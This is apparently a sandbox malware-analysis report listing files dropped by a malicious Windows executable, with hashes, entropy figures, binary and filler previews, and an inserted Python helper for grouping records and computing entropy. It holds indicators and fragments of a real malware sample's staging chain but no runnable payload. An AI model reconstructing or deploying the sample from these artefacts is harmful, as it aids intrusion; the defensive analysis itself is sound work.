                                                            Preview:..;.F..F@.j*1.....Q#z...G".....!yB...y..!\....{(.)K.K.3Zk.......sp/...9.V...H..,h..J..W.....\./............r.!5....x.yI....O..........#.c.s......U.....\HgVE..R.u.2....>V.....y6.]..W..!O.a......g.|.DN?@....p..:N..K..cz....Wk?..L.....P.-.yj........x=u......7.{.R.Di.!w.8.u..G9(.t.#dKT.U...(....}.<..;$.@..6Uq.....b...:._Fh'.....P.#.|F.wt.2*.'N.....B....W..H....@U.a....6.9.l.P.1.6.y.2.H.Q.L.0.Z.Y.5.Q.9.1.0.3.8.y.j.1.s.1.Y.9.1.4.u.0.S.5.7.V.1.1.7.S.q.2.2.0.....z..E...0.d.E.n..F@.P..&..&5...S..YM..}+.y.`...H*...q...."...}1Q..7./..F37.C.dSK..uWQ..t.(./&_o....:.4...Z>....5.3.3.i.A.6.d.1.0.3.4.z.Y.5.1.p.1.8.D.4.r.J.g.8.0.Y.F.1.6.9.2.v.b......)j.D.;M<?bE-..<.8R......{......=7py>.>.2...e....,.L.\...X....=..b..^.X........Q.....{vI^.]g[..O5..0U./....#=,9..Wz.5..L......qe.S."....S...4w.>_.A#m.b.7.r.......{..p..G+.z.[.-J:...#.U..Y..k..N&0.LQ.#..p.t._."1.0.i..~..E...2..B2h.q4..W.K.R......,....1.F.8.V.I.5.X.H.8.4.D.I.X.4.9.j.1.Q.X.5.c.d.....S..t.c6.{....d\0...!.F.pN..-
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):558
                                                            Entropy (8bit):5.54174792855503
                                                            Encrypted:false
                                                            SSDEEP:12:V1dtZGuB0144JUBpXIXYQTPaafLpWhV5cX4qLPtmWqRc:ttZjQ44JUBpXI1TftWh2VAc
                                                            MD5:50E0655BD2AD0316466463E9BA2BFB7A
                                                            SHA1:9EFCC43BAB881C5ED0C25DCB5B71C8F77B017B77
                                                            SHA-256:DC284BA52997D1F413830AAA7DADC69C36D9E7F80C0EBA5B51A533359F13D88C
                                                            SHA-512:642385885F4391D4830E16E0DD1F1B90BE07879105023D968613A7499D131AE1AEF927434D4677B2CC15159F0EDFCE6C6D4661A0DB3106A266F1B7A01F90985F
                                                            Malicious:false
                                                            Preview:41rx9j46e8774Q0k055j29vDB39ly790P2iBnpB61RPYczDCTr4C1PJ3C8t4Icmp3DCUq7854cjTI9X681EZu812rH22v562MZgt3365Y0J3BXWgDG2s51620S12u0h85j189p4P7z5zcLeRxb5..ComboConstants UpDownConstants..37U5MZ3d76v1VD2H8kj3gzq50I6718xA41069T54Us0p0A8O07EmC2WoEV8OU1vUXCq..ColorConstants ToolTipConstants..RSo7L8oB5gmp0GMU..ButtonConstants ButtonConstants..44t458LiNU72iV7c14Z..DateTimeConstants GuiDateTimePicker..28tB5B90yi282nszu56931d957YFxXq273v363C0WdG99Mw2UhTxLg352Hl0I..FontConstants ButtonConstants..3127S1375ZjND6l46MU8Hlp163T48ff4..DateTimeConstants StructureConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.630202092843055
                                                            Encrypted:false
                                                            SSDEEP:12:8wEinxz9TysEq0P2ubtawsMMy50P9RrvsyUUR5mvjXvrAW2OfsToaiRjP7:8xe3G/Mubtfs1yYrvsyUI5mrBnsw/
                                                            MD5:2D4C59440B9BA7F2602B787A4E54EC69
                                                            SHA1:2E83423FF6F24DB5EBC610535BF95194CC7DDE58
                                                            SHA-256:6B376AA5918FBC51CFF3557373CC24307971F1C4C12E5C9F81DB3455FAFA6D25
                                                            SHA-512:A14359E1D7ED9AA196DB723F7FB59883482C84AA1C29093F56FEB6B400F33E3D2A9DF58D8EB20283AD0B63DD12AB0BA447871411174AD911FB800C2CED50F51D
                                                            Malicious:false
                                                            Preview:2026m279q345qg7M7s697E173Tt2p186Lcv796SPkY6G93T9Hwy0c80h1jKW8F3EIK9yGir27L2vM794P586zJ..TreeViewConstants ToolbarConstants..92Q5cHUkbG08oG02Bp8raMsl4y5c79gd27w49Rhk215s2SP9480n1bha2407293BpL978x1G36019E10h1kz6442xzKG5H8zjA0..TreeViewConstants StructureConstants..43Tu3479C8sFmhlS7XwhfH2X84HI12TW5yJ7892p3NG6j18697vo71a9093oeVF2Y7800L414pv328dY..FileConstants GuiDateTimePicker..RC5718ZRq92T9sY5Zs6Yd3B93777ML67F2m780O681BS22442IdS58bOg4BF79G3a5Z..GuiDateTimePicker ButtonConstants..16S622KK43683FGk96y2vov7FBCLN9R06O52O320hVNAlcFqI4z82Ul9WfT8gJ3a8Nd4T..TreeViewConstants ComboConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):625
                                                            Entropy (8bit):5.475853492450421
                                                            Encrypted:false
                                                            SSDEEP:12:DcUgueO/P9RWMqKSbFt0P1u/UiE5mK/h53jJ6IijPARR:DcmV3vHSr/dE5mK/f96IiLARR
                                                            MD5:BF3CD347D5614EE1FC2AB7B1798164BB
                                                            SHA1:976562CC6D244AEFCA909FF3A31727E3AD710937
                                                            SHA-256:3605CD8EF5F90DB2E66E7EDFAA6B2F2CC376302112241BEF4BAD162F7C7EAB53
                                                            SHA-512:781A76D891CCFE35509E1D3C255D7E72F5D09A4A4DFBA5060802FC90C4989978660065DBB1ECAB4EEA1EE150DC9AD39CFA27CF0ED0879A1DE2BCD6E55C0B6483
                                                            Malicious:false
                                                            Preview:4b3vA9keP540R63i91C23..ButtonConstants DateTimeConstants..91aS881dbML4j1c98a3hfLh6N3600468o69eP9X040gwnZKX7u668MpOe7HIijmO47753T0632nH..TreeViewConstants StructureConstants..656p7OMVN24L77D9V1aLRL6Oc61937719..DateTimeConstants ButtonConstants..18f9007I1F0L606..TreeViewConstants FileConstants..s5YxrUg99915U198f1aFx39rC0417yXg320546w00O55J1NSZuqx0K256C68q3ll75F3h5l4F74o02O39avhy5R66Jy995k1zqi2Cwot0bKc2Z5168801E6o6dKK980CqRrV217t0975693Q645m4jFleB64re387Yaw53..ComboConstants ToolbarConstants..n8090464a26032Cw1KH6E4Pnu18079kn9EV98S6a644421Y9087z085vN124t9ANF89a5vU1U27K67lCC2Rz32fw1f8R..GuiDateTimePicker ToolbarConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):520
                                                            Entropy (8bit):5.6112414182811925
                                                            Encrypted:false
                                                            SSDEEP:12:kYidxNWWfUDF+acTH1en9OuSeVpmengFDjlLnMgyLOKmClB2rzujB0tP2R:kYIWWfWwhw99HFnSjlLnkpm64zkBXR
                                                            MD5:A46A327A0FCD8505553A963445E7E509
                                                            SHA1:3F15FBD861C19C4817A986F949C2A42808807975
                                                            SHA-256:0FCBF77B85E94EC077B5C96EC53FFCE6F1B2F559BF712A12387F189F6C544093
                                                            SHA-512:F5CF3EE0E0F9280E88A4C0E245F09C9699707F899575D76B8F406C1E1D8D3595D272F67644C702115B6E760614232623D552171FE1A6ECAC7063B956C22ED75F
                                                            Malicious:false
                                                            Preview:sL7gZM51T4a60J12e1zS61P5M51g9nSfUj0TUo8ws19Y40rI6uX92cP406a39Y11m8Q1638XHgSlSP45Y5mF673o8yk2y47W2t3pN6k2TYP31DBO51Qo6P4..DateTimeConstants DateTimeConstants..17djs29a5r166S1yA6dr023Vu509650MwK19e100OTKnK9FB80Zg0IZ49338cCzt4Veb1Mq0tVEs1Jx1K630655R1Mw881IKN2Io0r12R63nbv45DdOjON587uXA52Nc0j8s2I02qH..FontConstants UpDownConstants..XguGe0374591GMBNpL3VEWc59rWn4j4T5Eia603FcPWu2w0Ds7z36JyhFZ3d9026017Uae1DP8n682zdGpc3c59266f430S2L7LGy74i4170OM64D5j57S178NzkZP591I6ImR273S6j94t8W6rGz46v3..TreeViewConstants ToolbarConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: qPLzfnxGbj.exe, Detection: malicious
                                                            • Filename: ngPebbPhbp.exe, Detection: malicious
                                                            • Filename: FS04dlvJrq.exe, Detection: malicious
                                                            • Filename: M1Y6kc9FpE.exe, Detection: malicious
                                                            • Filename: mJIvCBk5vF.exe, Detection: malicious
                                                            • Filename: lcbF0sywlU.exe, Detection: malicious
                                                            • Filename: 1aG5DoOsAW.exe, Detection: malicious
                                                            • Filename: Factura-2410-CFDI.bat, Detection: malicious
                                                            • Filename: DGFmCcZnM0.exe, Detection: malicious
                                                            • Filename: qZkywW6Q0b.exe, Detection: malicious
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):947288
                                                            Entropy (8bit):6.629681466265794
                                                            Encrypted:false
                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: qPLzfnxGbj.exe, Detection: malicious
                                                            • Filename: ngPebbPhbp.exe, Detection: malicious
                                                            • Filename: FS04dlvJrq.exe, Detection: malicious
                                                            • Filename: M1Y6kc9FpE.exe, Detection: malicious
                                                            • Filename: mJIvCBk5vF.exe, Detection: malicious
                                                            • Filename: lcbF0sywlU.exe, Detection: malicious
                                                            • Filename: 1aG5DoOsAW.exe, Detection: malicious
                                                            • Filename: Factura-2410-CFDI.bat, Detection: malicious
                                                            • Filename: DGFmCcZnM0.exe, Detection: malicious
                                                            • Filename: qZkywW6Q0b.exe, Detection: malicious
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
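The two PE32 records above carry the same SHA-256 (98E4F904...AB884B) but different parent processes (uhbrQkYNzx.exe and the RarSFX0\tguujh.msc it extracted), and the many small "ASCII text" drops all sit near 5.5 bits of entropy, which is close to the log2(62) ceiling for alphanumeric-only text. The helper below is an added example and is not part of the Joe Sandbox report or its tooling: it parses records laid out as Key:Value lines the way this listing is, recomputes the 8-bit Shannon entropy the "Entropy (8bit)" field shows, and groups records by SHA-256 so one binary written by several parents stands out. SAMPLE_REPORT is constructed from three records on this page; the byte strings passed to shannon_entropy() are constructed inputs, not the dropped files themselves.

```python
"""Triage helper for a sandbox 'Dropped Files' listing (added example).

Parses Key:Value records, recomputes 8-bit Shannon entropy, and groups
records by SHA-256 to flag a binary dropped by more than one process.
"""
import math
from collections import Counter, defaultdict

# Constructed from three records on this page (Preview lines omitted).
SAMPLE_REPORT = r"""
Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):947288
Entropy (8bit):6.629681466265794
SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):947288
Entropy (8bit):6.629681466265794
SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
Malicious:true
Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):569
Entropy (8bit):5.546164799845927
SHA-256:E24AC134DC8B26B8036B0CD4671E4FC722E3391D5D72B897070398ED0D377353
Malicious:false
"""

# 0-9, A-Z, a-z: the alphabet the small ASCII drops appear to use.
ALNUM = bytes(range(48, 58)) + bytes(range(65, 91)) + bytes(range(97, 123))


def parse_records(text: str) -> list:
    """Split the listing into dicts; each 'Process:' key starts a new record.

    Only the first ':' separates key from value, so Preview lines that
    themselves contain colons survive intact.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the quantity reported as 'Entropy (8bit)' (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_ceiling(alphabet: bytes) -> float:
    """Highest entropy any text drawn from this alphabet can reach."""
    return math.log2(len(set(alphabet)))


def shared_hashes(records: list, key: str = "SHA-256") -> dict:
    """Hashes written by more than one distinct parent process -> [processes]."""
    by_hash = defaultdict(list)
    for rec in records:
        digest, proc = rec.get(key), rec.get("Process")
        if digest and proc and proc not in by_hash[digest]:
            by_hash[digest].append(proc)
    return {h: procs for h, procs in by_hash.items() if len(procs) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for digest, procs in shared_hashes(recs).items():
        print(f"{digest[:16]}... dropped by {len(procs)} processes:")
        for p in procs:
            print(f"    {p}")
    print(f"alphanumeric ceiling: {entropy_ceiling(ALNUM):.3f} bits/byte")
    print(f"uniform 0x00-0xFF:    {shannon_entropy(bytes(range(256))):.3f}")
```

Reading the output against the report: a single-hash binary reaching disk from two parents is the same payload being staged twice, which is worth one detection rule rather than two, and a text drop whose entropy sits just under the alphanumeric ceiling is consistent with random-looking filler rather than compressed or encrypted content, even though the report marks it "Encrypted: false" for its own reasons.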
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):545
                                                            Entropy (8bit):5.58091263701808
                                                            Encrypted:false
                                                            SSDEEP:12:Tnqr73jzdJDfIR2GeKGt5K7Vu7PGKlS2Q6FVBPc:2lJza25t5K7VYT66bO
                                                            MD5:F1A4A151D27950929A91C6C98DD4386C
                                                            SHA1:693545012853D5C5A82778B73A766D0571B812CF
                                                            SHA-256:593EBB913D36131695583CA72F0089D896219F7184E96576D62A470D2481271C
                                                            SHA-512:66DE7CB53C15B52B786E246B7E0D60866EE69207B22579A59CA142F063F59F5FA59209B8104457E43D6F8A6B6E3037346E1ACCC1506C62D279608970CC765316
                                                            Malicious:false
                                                            Preview:LBk10C5325TYW40h7sXHNWaoJ58h..ComboConstants FileConstants..9394eH54r2SmH59329772649xJQgnK74oY24xZaYcrz4jz173293338e2DHs45C6li35gG13GGJvl440ICwz50H16P6476837Ei4y63Tw6LMCmG62Om6sY2Ia..ButtonConstants StructureConstants..9k86ONlpV05GBZ9B7mC8vL90p9jnfBV0cO9Pn750xq9s52q60z16tRz0005A0sNw1n366i53bSY0Dl84675uI30k..ToolbarConstants ToolbarConstants..92ViO23876XSs6aO83d8gtk16pV2f389r20dD42Ep2JmbDTzm43227T40QXJtO508W46K23441z60UCCM7TUI8675n1l0T451re4dpL9EY4WouO1AVS1S8F415Q561sN3Mf522cjAp39Dl20op0Qj508741vHpMz6m019c..FileConstants TreeViewConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):571495
                                                            Entropy (8bit):4.050101452531791
                                                            Encrypted:false
                                                            SSDEEP:6144:S8+nw3X1oeYXD39Gp74IazTb9A/OZBWxCcY5Nydt:sRe+DtU7FapA/Ork
                                                            MD5:4F363A080CC5B7DF87865134BEA5A5A8
                                                            SHA1:186AE3A77464644CDA4D0088F2FE47CADA63C411
                                                            SHA-256:3EB7D48ECC57056FD63D437C73E2D97004D83C3F81D9D12FD59F9BD02BAEB47F
                                                            SHA-512:C35F1CE633482418B2FD23D6FAA4FCEB118F90C9C08106E5DAF5E65DFFF81F73FC1B76BFE910A1B3C861EAA3614C07A9A50745A4226FB775C0D7D05FF1D8FAEC
                                                            Malicious:false
                                                            Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0_8]]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]790/09*03D6067F33D6067F33D6067F3/**6*8F33*6067F3/**6**F33C6067F3/**6*_F33C6067F3526963683D6067F3]]]]]]]]5045]]4C0/0/]63D64256]]]]]]]]E]]20/0_0/0_]]5*04]]]]]]]]]80/4]]]/]]]07]4]]]4]]0/]]]]2]]06]]]]]]]06]]]]]]]]7]4]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]445804]]/]]]05*04]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):582
                                                            Entropy (8bit):5.529913214319818
                                                            Encrypted:false
                                                            SSDEEP:12:5Vl2jmcGvcR3vv6oOolhpPDO6gSIxYYITpyTjpRM:r0jmcEcRX61ovliPYYITV
                                                            MD5:2F2C210833CD14B8EAD0EEEBD118308C
                                                            SHA1:BAB671003DD2BDF41EA415C7FD34CD334FCD74D7
                                                            SHA-256:49482D956DFE1659D6EB46A6540943779A2286A3BDB098CD3408821CBFA6C7BC
                                                            SHA-512:9772264E779E6BE0837BC4AE84C411AAC8D810F6582A7E4A475DF87F4FEF7FBA1A391DBCFB0E181AFCB9BC9F34E0848173A69D13D53B7EC92DE66268FA2B6798
                                                            Malicious:false
                                                            Preview:yrRE1HZhl391H0v198a5rrVLU58T5Ima11ka577E0YxCS3wC900RJ4SWXQc4i31985b91008qAe19y612ywy050..ComboConstants ButtonConstants..Y2Mn5ss695YN141D7UwLG8o50Yn30O3PKmjb8KMd11O15gcBy8378liU18Z1DGI94u9PyRZJ3475B06EP4344T82XF4r18Mp7wOq2584rH0snMtYtB207Fj62eg8t3SH4m2AUfGm9U258..DateTimeConstants BorderConstants..V9MPt1p48z1zq3..UpDownConstants DateTimeConstants..4Qvm49W5pX45QZgZy9T6X0s8zwY0119t7211mW778Z5l41wlYok5l4132ZZ4Ci072127W5m13141q68496p1Hc6GiS76Z5i2W7uAk6..BorderConstants FileConstants..945k347B64Vb115B50k521Gb7T2s9lQtO515F46ZFK5mmX1564n7s7CvUv007f2..ButtonConstants ColorConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):5.607034598914599
                                                            Encrypted:false
                                                            SSDEEP:12:UzEzzPUSIuzJEIiD/tV9Z5RWdCJX+Ms5cifEbUKlJ:MvSIuzJJiD/tRzskX+JTf7wJ
                                                            MD5:D49513890FB6627AC0EDBE70EECFADCF
                                                            SHA1:E27A186C75DB61200D77ECFD61DE6DF4915A73AD
                                                            SHA-256:DB5D23C7B678C4AA7EC1EFC31C08276B38B98DD1DFC17F64D6963210368E233B
                                                            SHA-512:4F0A5A8FA20BC9C9C1941EC9FF2BDF65093305DE39283867AED1D8AB58CB4B63F2F9F140EE40A1CD4F455AF8368DF93419B625FCD3353C939A808223A47F091D
                                                            Malicious:false
                                                            Preview:s6b6tXEb9X3TJAsDJ2r34Joy..TreeViewConstants FontConstants..GgU5044t42c0lXW8e5p1z96t7Cyb59280E00y1P923gIix6S307p5LYhL976480565Qx1Q5O9203Q90LUlOl7B04WGq5Rpzn1hB7Xi2pkk739d1MLzJ715bvh3q0tSCl02f1L8ST46TA..UpDownConstants ToolbarConstants..0l1G4Qh5N073l76DW2990C43eosFAAT3w4497r6utWpR733D..FileConstants StructureConstants..H8s73W8K9X0Bp30M8vq60x8k1z528Y78H6w4Z22LT5shJJ2ZH709h41VPr87Yeh87St27gM7Lc8654c9O2ngO25a25mJ66Nv63lxb9d7HK8ru5QB6Xc1271G0vG96nywBwJdh50dw66KjLK2w34634P60..ComboConstants FontConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):593
                                                            Entropy (8bit):5.554946572919045
                                                            Encrypted:false
                                                            SSDEEP:12:C1pjQ0FcuSRjhZIcQiaEKk42KQORto7XbWPWM3xLmv:68+0dYGf4lpRto78WaKv
                                                            MD5:CD8691BCAA6705A65F08C872A0AE7BC5
                                                            SHA1:5E27EA4FC964E45D202023F8FC936CC6BA3F8A16
                                                            SHA-256:27C93A8E6BAB6487A5AC8AB450FCDE1725387B5C64B324388D6C773AB669FB46
                                                            SHA-512:F7C9F29E7D474370F458587A00BEAAFB3AAE8A3B84D5912D90C2CC0CBEBDED0C822C1FC2C996EAA94D5CFD906E3E0213F18FA6F7E80FD4F90ED001DD2947BFFA
                                                            Malicious:false
                                                            Preview:01VQwM7xt648M7u3042836G6u2T49906n76fV387412jxzz9hc5743483U69117e8Z722..ButtonConstants FileConstants..94966G9TOzGS6ebo42gyHD63He90uu65uM6s5540267589239496WM07AdI666t6v2Gk875Gu3dXzx68e27O4XR37em46qe3c7Iu76ckS5N71Y4qz46fYr95rMXg8XnkgD301G71M..UpDownConstants ToolTipConstants..tR4Zxd06x9Pp76Z913dan53622t3YtsB0eGC6ZeZ2vT35RrK0ZA3qpeU6296j8054CF7w678xSYp035F0nd59f01n57ZN4L73175Q5519k4821dTaSUxe0A0R8R4JksVEcYFB540459207C6O43WJF39j3..StructureConstants ColorConstants..6NB0UQ4bv2Vn07i6u41973XJD3w71hu9u10J6HHc03zu6DE5g31251uZ3qv8h86Ui9hT81V6auT6U25T01R532WJ..GuiDateTimePicker GuiDateTimePicker..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):539
                                                            Entropy (8bit):5.599725191775324
                                                            Encrypted:false
                                                            SSDEEP:12:H1jqJ8dWGxex174ecKfDjWgPAteL5pHWCM4wexH9lFPqv:H1+J8UG617yKf3WgkeLLZMGjlYv
                                                            MD5:AF0541E9FAE855E7A52E80C9E0405F98
                                                            SHA1:6F7856575250142D114ACA995A9652990C1E0078
                                                            SHA-256:0CBA71E467A718727C02FFC94934340EE623B1504CEABC4FB6D317D2A7AD5F58
                                                            SHA-512:C0CA701BEEC8CD1202C4B006095082C2DDD4EA1EA4F2DC50E9D23F1A18C6AC35C217DC895CBBF5690855F94134AD0143D44D69A36C63228422ECF176BA06FDA5
                                                            Malicious:false
                                                            Preview:p36H6SjF1562QK56348s32gcNz517N5662lv8pdm4r0eAz8fX4r7m2..FontConstants FileConstants..2q1cqu0404NIS9VG8Mjh61D038cdWjhG4w9A5arv4083a2Sl2ZvCi21450k7T1rY4M3695u17x75p78knj1A3551k062y15n0HQ81674XVm278BHqV9BB4..FileConstants ToolTipConstants..8069WkM442S98Ck6X8qEy04FZ559vzE55a622039qW53V3PzpL955..GuiDateTimePicker BorderConstants..6J9p1n1d3W41i957604290382V80Z8d5srf5S9z60zxOC69D2SE23f1xHic64d9uj3tN43atG16aua5en37GmNVB91Ho47EqXr6C2ChWv6F2565oFp2d38N0n6p7P89TKr23C86U2A2T6M0W7qRonO5741bIXaSbkJ65Ro9q071v8..TreeViewConstants GuiDateTimePicker..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.52732025652089
                                                            Encrypted:false
                                                            SSDEEP:12:aPfXoJTHK5bH2O6265mFeHyN5oV66dRdN0Q5yuXhQX6:aPfXUHOT2j5mCbLXv0MnRf
                                                            MD5:7AFA77936136795EEE474D1427C6860B
                                                            SHA1:F3DD2C335A2A1556EC7E0C4B1A84B879D7871A61
                                                            SHA-256:F2C9099CD19481ADCDF5ACCD3141031DEA2069F4AB946F82E48324390BB7212B
                                                            SHA-512:838A510F9D5D749972277FA36B5F88F4BB2D3A3EFC40004878116D396E0E73CA3A7A3BAC5A086E8AB16BFCEA8FE40B280456CD7B45B09046EE754951B85E9B7B
                                                            Malicious:false
                                                            Preview:z5E82EiiIn4Yt18i7Tiim73D520Mpj99Evsi23x2d3lPtAysi12Y1u7tiw..BorderConstants ToolbarConstants..33q1N513L71427ZT8263TVkkE..StructureConstants ToolbarConstants..9B431z07D8Po264MBdr2oW9ae05oNiv4213K1E3BJh7GPE8WC225227k757d0181d01u3C6i07igd0rGwr8J93Q5j08S21382ol6QtF630X7k90repT9Z14Rt8Md4P..ToolTipConstants FontConstants..7A4y643yf5QC92oL71xa1uN89Wz33011Yj..ButtonConstants StructureConstants..3y8YAG940NwH1ug4idIE9krI8t9U9bN617z7mGoL1K2V7ml35g9..ToolTipConstants GuiDateTimePicker..63428ZGBf9AXr1WjTvh953tIS5QKkGNTP5erclxJ7xc960515C1757g85x6tNg64VzD2063a6..BorderConstants UpDownConstants..
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):604
                                                            Entropy (8bit):5.630742912178927
                                                            Encrypted:false
                                                            SSDEEP:12:giOiIMLFEZOJDMmmCxVrZufKPD5ViQ6QnY9iqP2R:NOfM9JiCxdZdusYGR
                                                            MD5:A7D646B218E8D14309054A445F055721
                                                            SHA1:A9B352E14544F39E52ED37CAE95C133DDE10A166
                                                            SHA-256:4361A6ED7BF9F6ADFEDCD6C211FC5C0759BC0564653E372BC127881974466934
                                                            SHA-512:327C01AE6CDF9844E45ADBFCEBA2B3E3473C1C7F963992B781956FA9F3DE96E19D6570F6AA928CB208732214D339655A8015A19C57D1274723F66C32F56CCB04
                                                            Malicious:false
